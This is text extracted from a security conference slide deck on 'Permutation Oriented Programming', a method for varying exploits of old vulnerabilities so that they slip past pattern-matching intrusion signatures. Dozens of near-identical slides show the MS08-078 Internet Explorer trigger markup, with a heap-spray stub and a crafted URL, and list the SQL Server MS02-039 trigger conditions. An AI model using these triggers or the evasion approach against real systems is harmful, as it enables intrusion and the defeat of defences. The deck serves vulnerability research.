7. Before starting
0-Day Pattern-matching
• 0-day is cool, isn’t it? But only if nobody is aware of its • This technology is as need today as it was in the past,
existence. but the security solution cannot rely only on this.
• Once the unknown vulnerability becomes known, the • No matter how fast is the pattern-matching
0-day will expire – since a patch or a mitigation is algorithm, if a pattern does not match, it means that
released (which comes first). there is no vulnerability exploitation.
• So we can conclude that, once expired (patched or • No vulnerability exploitation, no protection action…
mitigated), 0-day has no more value. If you do not But what if the pattern is wrong?
believe me, you can try to sell a well-known
vulnerability to your vulnerability-broker. • How can we guarantee that the pattern, which did
not match, is the correct approach for a protection
• Some security solutions fight against 0-day faster action? Was the detection really designed to detect
than the affected vendor. the vulnerability?
8. Some concepts
Exploitation Vulnerability
• There are lots of good papers and books describing • Any vulnerability has a trigger, which leads the
the exploitation techniques. Thus, I do recommend vulnerability to a possible and reasonable exploitation.
you to look for them for a better understanding.
• For some weakness types the vulnerability allows to
• This lecture has no pretension of being a complete control the flow of software’s execution, executing
reference for this topic. an arbitrary code (shellcode), such as: CWE-119, CWE-
120, CWV-134, CWE-190, CWE-196, CWE-367, etc.
• The exploitation path described here is something
that I decided to follow, and it helped me to • Before executing a shellcode, the exploitation must
understand and apply POP (f.k.a. ENG++) to the deal with the vulnerable ecosystem (trigger, return
vulnerabilities. address, etc…), performing memory manipulation on
additional entities (such as: offset, register,
• All the definitions are in compliance with: JUMP/CALL, stack, heap, memory alignment,
memory padding, etc).
– Common Vulnerabilities and Exposures.
– Common Vulnerability Scoring System.
– Common Weakness Enumeration.
10. What is Permutation Oriented Programming?
The scenario The technique
• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching
day faster than the affected vendor”. technology, there are two options:
– Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and (access to signature/vaccine).
sometimes the correct protection (patch) is not
– Harder: know deeply how to trigger the
applied.
vulnerability and how to exploit it (access to
vulnerable ecosystem).
• Sometimes, even vendors might adopt pattern-
matching to release a mitigation (workaround) while
working on a correct patch. • Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching
• People’s hope, consequently their security strategy, for alternatives.
resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives
no patch… to offer a variety of decision points (variants).
– Intended to change the behavior of exploit
• But what if an old and well-known vulnerability could developers.
be exploited, even on this security approach model?
– Use randomness to provide unpredictable
payloads, i.e., permutation.
• According to pattern-matching, any new variant of an
old vulnerability exploitation is considered a new
vulnerability, because there is no pattern to be
matched yet!
11. What is Permutation Oriented Programming?
The scenario The technique
• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching
day faster than the affected vendor”. technology, there are two options:
– Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and (access to signature/vaccine).
sometimes the correct protection (patch) is not
– Harder: know deeply how to trigger the
applied.
vulnerability and how to exploit it (access to
vulnerable ecosystem).
• Sometimes, even vendors might adopt pattern-
matching to release a mitigation (workaround) while
working on a correct patch. • Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching
• People’s hope, consequently their security strategy, for alternatives.
resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives
no patch… to offer a variety of decision points (variants).
– Intended to change the behavior of exploit
• But what if an old and well-known vulnerability could developers.
be exploited, even on this security approach model?
– Use randomness to provide unpredictable
payloads, i.e., permutation.
• According to pattern-matching, any new variant of an
old vulnerability exploitation is considered a new
vulnerability, because there is no pattern to be
matched yet!
12. What is Permutation Oriented Programming?
The scenario The technique
• Remember: “Some security solutions fight against 0- • To circumvent or avoid a pattern-matching
day faster than the affected vendor”. technology, there are two options:
– Easier: know how the vulnerability is detected
• This protection (mitigation) has a long life, and (access to signature/vaccine).
sometimes the correct protection (patch) is not
– Easier: know deeply how to trigger the
applied.
vulnerability and how to exploit it (access to
vulnerable ecosystem).
• Sometimes, even vendors might adopt pattern-
matching to release a mitigation (workaround) while
working on a correct patch. • Permutation Oriented Programming:
– Deep analysis of a vulnerability, (re)searching
• People’s hope, consequently their security strategy, for alternatives.
resides on this security model: vulnerability mitigated, – Use all the acquired knowledge and alternatives
no patch… to offer a variety of decision points (variants).
– Intended to change the behavior of exploit
• But what if an old and well-known vulnerability could developers.
be exploited, even on this security approach model?
– Use randomness to provide unpredictable
payloads, i.e., permutation.
• According to pattern-matching, any new variant of an
old vulnerability exploitation is considered a new
vulnerability, because there is no pattern to be
matched yet!
13. POP (pronounced /pŏp/) technique
The truth The examples
• POP technique deals with vulnerable ecosystem and • Server-side vulnerabilities:
memory manipulation, rather than shellcode. – MS02-039: CVE-2002-0649/CWE-120.
– MS02-056: CVE-2002-1123/CWE-120.
• POP is neither a new polymorphic shellcode
technique, nor an obfuscation technique: • Client-side vulnerabilities:
– Shellcode is the last thing the exploitation – MS08-078: CVE-2008-4844/CWE-367.
and/or detection should care about.
– MS09-002: CVE-2009-0075/CWE-367.
– Obfuscation is not an elegant technique to
apply to an exploitation.
• Windows 32-bit shellcodes:
• POP technique can be applied to work with Rapid7 – 波動拳: “CMD /k”.
Metasploit Framework, CORE Impact Pro, Immunity – 昇龍拳: “CMD /k set DIRCMD=/b”.
CANVAS Professional, and regular stand-alone
proof-of-concepts (freestyle coding). • All example modules were ported to work with
Rapid7 Metasploit Framework, but there are also
• POP technique maintains the exploitation reliability, examples for client-side in HTML and JavaScript.
even using random decisions, it is able to achieve all
exploitation requirements.
17. What if…
exploit #1
exploit #N exploit #2
shared zone
18. What if…
exploit #1
exploit #N exploit #2
shared zone
19. What if…
exploit #1
exploit #N exploit #2
shared zone
Permutation
Oriented
Programming
20.
21. Vulnerabilities
MS02-039 MS08-078
• Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures:
– CVE-2002-0649. – CVE-2008-4844.
• Common Weakness Enumeration: • Common Weakness Enumeration:
– CWE-120. – CWE-367.
• CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH).
• Target: • Target:
– Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7
and 8 Beta 2.
• Vulnerable ecosystem:
– Protocol UDP. • Vulnerable ecosystem:
– Communication Port 1434. – XML Data Island feature enabled (default).
– SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding.
– INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO).
– INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a
dereferenced XML DSO.
22. Vulnerabilities
MS02-039 MS08-078
• Common Vulnerabilities and Exposures: • Common Vulnerabilities and Exposures:
– CVE-2002-0649. – CVE-2008-4844.
• Common Weakness Enumeration: • Common Weakness Enumeration:
– CWE-120. – CWE-367.
• CVSS Severity: 7.5 (HIGH). • CVSS Severity: 9.3 (HIGH).
• Target: • Target:
– Microsoft SQL Server 2000 SP0-2. – Microsoft Internet Explorer 5.01 SP4, 6 SP0-1, 7
and 8 Beta 2.
• Vulnerable ecosystem:
– Protocol UDP. • Vulnerable ecosystem:
– Communication Port 1434. – XML Data Island feature enabled (default).
– SQL Request CLNT_UCAST_INST. – DHTML with embedded Data binding.
– INSTANCENAME >= 96 bytes. – XML Data Source Object (DSO).
– INSTANCENAME != NULL. – Data Consumer (HTML element) pointing to a
dereferenced XML DSO.
54. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
55. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
56. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
57. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
58. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::CRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
59. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CCurrentRecordConsumer::Bind
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
60. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CCurrentRecordInstance::GetCurrentRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
61. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CXfer::CreateBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
62. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
63. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
64. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::AddBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
65. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CImplPtrAry::Append
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
66. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
67. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
68. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
69. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
70. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CRecordInstance::CRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
71. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CCurrentRecordConsumer::Bind
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
72. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CCurrentRecordInstance::GetCurrentRecordInstance
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
73. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CXfer::CreateBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
74. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataFld
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
75. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CElement::GetAAdataSrc
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
76. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CRecordInstance::AddBinding
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
77. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
CImplPtrAry::Append
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
78. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
XML Data Source Object #01
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
79. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::TransferToDestination
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
80. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
81. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CXfer::TransferFromSrc
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
82. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
83. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::RemoveBinding
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
84. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
_MemFree
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
85. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
HeapFree
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
86. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
RtlFreeHeap
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
87. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
RtlpLowFragHeapFree
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
88. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CImplAry::Delete
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
89. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CRecordInstance::Detach
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
90. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
91. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
CXfer::TransferFromSrc
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
<SCRIPT LANGUAGE=“JavaScript”>function heapSpray()</SCRIPT>
92. memory manipulation vulnerability
Internet Explorer Microsoft® HTML Viewer – MSHTML.DLL
(Data Consumers) (Binding Agent)
Data Consumer #01
0a0a0a0a.00n00b00r00i00t00o00.00n00e00t
DATASRC DATAFLD
Data Consumer #02
XML Data Source Object #02
DATASRC DATAFLD
<XML ID=I><X><C><![CDATA[<IMG SRC=http://ਊਊ.nbrito.net>]]></C></X></XML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>
